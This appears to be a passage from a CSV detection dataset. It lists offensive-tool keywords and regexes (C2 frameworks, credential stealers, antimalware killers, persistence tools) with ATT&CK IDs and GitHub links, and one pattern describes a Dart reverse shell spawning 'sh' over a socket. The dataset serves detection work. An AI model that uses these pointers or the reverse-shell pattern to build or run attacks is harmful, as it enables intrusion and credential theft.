Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ImpersonateAndUnload.cpp*",".{0,1000}ImpersonateAndUnload\.cpp.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*ImpersonateFromParentPid -ppid*",".{0,1000}ImpersonateFromParentPid\s\-ppid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*ImpersonateLocalService*",".{0,1000}ImpersonateLocalService.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ImpersonateLoggedOnUser*",".{0,1000}ImpersonateLoggedOnUser.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*impersonate-main.zip*",".{0,1000}impersonate\-main\.zip.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*impersonateprocess.py*",".{0,1000}impersonateprocess\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*impersonateuser.boo*",".{0,1000}impersonateuser\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*impersonateuser.py*",".{0,1000}impersonateuser\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Impersonation #1 done.*",".{0,1000}Impersonation\s\#1\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #1 failed. Exiting*",".{0,1000}Impersonation\s\#1\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #2 done.*",".{0,1000}Impersonation\s\#2\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #2 failed. Exiting*",".{0,1000}Impersonation\s\#2\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*imperva_gzip.py*",".{0,1000}imperva_gzip\.py.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","150","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*Implant*TeamServer.exe*",".{0,1000}Implant.{0,1000}TeamServer\.exe.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Implant.ImplantGenerator*",".{0,1000}Implant\.ImplantGenerator.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*implant.sleep-obf*",".{0,1000}implant\.sleep\-obf.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*implant/elevate/*",".{0,1000}implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/gather/*",".{0,1000}implant\/gather\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/inject/*",".{0,1000}implant\/inject\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/persist/*",".{0,1000}implant\/persist\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/pivot/*",".{0,1000}implant\/pivot\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/sliver/*",".{0,1000}implant\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Implant\SleepMask*",".{0,1000}Implant\\SleepMask.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*implant-callback.*",".{0,1000}implant\-callback\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*Implants/powershell.ps1*",".{0,1000}Implants\/powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*ImplantSSP.csproj*",".{0,1000}ImplantSSP\.csproj.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*import _eternalhush*",".{0,1000}import\s_eternalhush.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*import apypykatz*",".{0,1000}import\sapypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*import BaseSprayModule*",".{0,1000}import\sBaseSprayModule.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*import check_currrent_user_privilege*",".{0,1000}import\scheck_currrent_user_privilege.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*import check_sudoers_misconfigurations*",".{0,1000}import\scheck_sudoers_misconfigurations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*import 'dart:io';*Socket.connect(*, *Process.start('sh', [])*socket.write(output);*",".{0,1000}import\s\'dart\:io\'\;.{0,1000}Socket\.connect\(.{0,1000},\s.{0,1000}Process\.start\(\'sh\',\s\[\]\).{0,1000}socket\.write\(output\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*import DCSYNC*",".{0,1000}import\sDCSYNC.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*import DNSListener*",".{0,1000}import\sDNSListener.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*import DPLootSMBConnection*",".{0,1000}import\sDPLootSMBConnection.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*import EnablePersistence*",".{0,1000}import\sEnablePersistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*import eternalhush.*",".{0,1000}import\seternalhush\..{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*import EVILRDPConsole*",".{0,1000}import\sEVILRDPConsole.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*import EvilRDPGUI*",".{0,1000}import\sEvilRDPGUI.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*import IBurpExtender*",".{0,1000}import\sIBurpExtender.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*import impacket*",".{0,1000}import\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*import ImpactDecoder*",".{0,1000}import\sImpactDecoder.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*import ImpactPacket*",".{0,1000}import\sImpactPacket.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*import LdapSearchBofParser*",".{0,1000}import\sLdapSearchBofParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*import metame",".{0,1000}import\smetame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*import mythic*",".{0,1000}import\smythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*import np_server*",".{0,1000}import\snp_server.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*import org.jnativehook.keyboard.NativeKeyListener*",".{0,1000}import\sorg\.jnativehook\.keyboard\.NativeKeyListener.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import Payload*",".{0,1000}import\sPayload.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import pe.OBJExecutable*",".{0,1000}import\spe\.OBJExecutable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*Import powerview*",".{0,1000}Import\spowerview.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*import PupyConfig*",".{0,1000}import\sPupyConfig.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 